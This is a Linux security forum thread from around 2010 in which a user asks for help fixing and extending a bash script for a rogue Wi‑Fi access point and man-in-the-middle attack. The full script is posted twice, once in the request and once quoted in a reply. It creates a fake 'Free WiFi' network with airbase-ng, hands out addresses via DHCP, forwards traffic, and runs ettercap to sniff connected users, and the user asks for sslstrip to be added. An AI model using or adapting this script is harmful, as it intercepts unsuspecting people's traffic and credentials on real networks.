Results 1 to 9 of 9

Thread: rogue AP + MITM (tutorial or script request)

  1. #1
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Question rogue AP + MITM (tutorial or script request)

    Update: I've made my own tutorial by now: http://www.backtrack-linux.org/forum...-sniffing.html

    Cheers
    Last edited by Lucifer; 03-26-2010 at 06:54 PM.

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: rogue AP + MITM (tutorial or script request)

    That page is still available in Google Cache. It doesnt appear to have been archived. Get it while its hot by searching Goole for the following:

    Code:
    cache:http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Question Re: rogue AP + MITM (tutorial or script request)

    lupin, thank you for replying.
    I've tried the link you've provided, but it doesn't seem to work, or I don't know how to get it.
    I've just tried to open it in a webbrowser, but the page wasn't avaible.

    cheers

  4. #4
    Junior Member
    Join Date
    Feb 2010
    Posts
    42

    Default Re: rogue AP + MITM (tutorial or script request)

    Quote Originally Posted by Lucifer View Post
    lupin, thank you for replying.
    I've tried the link you've provided, but it doesn't seem to work, or I don't know how to get it.
    I've just tried to open it in a webbrowser, but the page wasn't avaible.

    cheers
    as the man said "Search Google" with what he pasted...
    -Wes-

  5. #5
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

    Default Re: rogue AP + MITM (tutorial or script request)

    Hey there,

    I came across the same problem. The cached website is just trying to download images and other stuff we don't need, which it is unable to.

    The solution is to click "Text-only version" in the top left of the page. This strips all the graphics out and just shows you the text, which is all we need to get going. If you have any other bookmarked pages you want to view the same way, load the page in your browser, copy the URL, google it, then click "cached" under the result that's given, and click "Text-only version" to see the text.

    Hope this helps,
    Kalibur

  6. #6
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Question Re: rogue AP + MITM (tutorial or script request)

    Thanks for your help guys.
    Now, I'm trying to run the script, but I'm having some trouble with dhcp.
    the tutorial/script from the old forum was made for backtrack 3, and needs some updates.
    can someone with knowledge review this script?
    I modified it a bit as it used 'dhcpd', but I think backtrack 4 final uses 'dhcp3', but the dhcp server isn't working properly, it must be the code that's wrong, I never coded anything before, and my backtrack/linux skills are still very limited, so please bear with me.
    I'm using this dhcpd.conf: Deathray [bash] Paste - f1859fad7 - Pastebin.com
    the current script:
    -----------------------
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd3 airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    konsole -e airbase-ng -e "$ESSID" -P -C 15 -v $WIFACE &
    sleep 10
    ifconfig at0 mtu 1400
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/lib/dhcp3/dhcpd.leases'
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd &
    konsole -e dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &

    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward

    the part that's highlighted is what must be wrong, or the dhcpd.conf isn't right.
    also, would someone be so kind to add sslstrip function to this script?
    any help is greatly appreciated.

    credit goes out to Deathray for making the script.

    L.
    Last edited by Lucifer; 02-23-2010 at 09:25 PM.

  7. #7
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Question Re: rogue AP + MITM (tutorial or script request)

    Somebody? I'll be very thankfull if you can help me get this script right. the DHCP server part is wrong, when I connect to thefake ap, I'm getting an IP, but no internet. maybe the gateway is wrong. I'm really searching in the dark about how to configure the dhcp.conf, some help would be great.

    Lucifer

  8. #8
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: rogue AP + MITM (tutorial or script request)

    Quote Originally Posted by Lucifer View Post
    credit goes out to Deathray for making the script.
    I'm back from the dead I gave up my time for security and Linux once school started to concentrate on that, practically everything we learned about was related to Microsoft in some way so wanted 100% concentration for school. But I'm done now, got a steady job and I'm going to try and pick up on it all once again. So hi! Hope everyone is doing good

  9. #9
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: rogue AP + MITM (tutorial or script request)

    Quote Originally Posted by Lucifer View Post
    Thanks for your help guys.
    Now, I'm trying to run the script, but I'm having some trouble with dhcp.
    the tutorial/script from the old forum was made for backtrack 3, and needs some updates.
    can someone with knowledge review this script?
    I modified it a bit as it used 'dhcpd', but I think backtrack 4 final uses 'dhcp3', but the dhcp server isn't working properly, it must be the code that's wrong, I never coded anything before, and my backtrack/linux skills are still very limited, so please bear with me.
    I'm using this dhcpd.conf: Deathray [bash] Paste - f1859fad7 - Pastebin.com
    the current script:
    -----------------------
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd3 airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    konsole -e airbase-ng -e "$ESSID" -P -C 15 -v $WIFACE &
    sleep 10
    ifconfig at0 mtu 1400
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/lib/dhcp3/dhcpd.leases'
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd &
    konsole -e dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &

    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward

    the part that's highlighted is what must be wrong, or the dhcpd.conf isn't right.
    also, would someone be so kind to add sslstrip function to this script?
    any help is greatly appreciated.

    credit goes out to Deathray for making the script.

    L.
    Check out this thread. I modded his script to work with BT4, and added some minor things to it.
    http://www.backtrack-linux.org/forum...tml#post157888

Similar Threads

  1. Exploit-db quick navigation tutorial
    By Lincoln in forum BackTrack Howtos
    Replies: 2
    Last Post: 03-17-2011, 01:46 PM
  2. bt4-customise script?
    By Mr-Protocol in forum Beginners Forum
    Replies: 3
    Last Post: 06-15-2010, 12:28 PM
  3. msf: small webaudit shell script
    By m-1-k-3 in forum Experts Forum
    Replies: 4
    Last Post: 04-21-2010, 05:48 PM
  4. Unable to handle kernel paging request
    By aaron101 in forum Beginners Forum
    Replies: 2
    Last Post: 01-29-2010, 12:32 AM
  5. Shell script
    By bbakker in forum Beginners Forum
    Replies: 1
    Last Post: 01-24-2010, 01:02 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •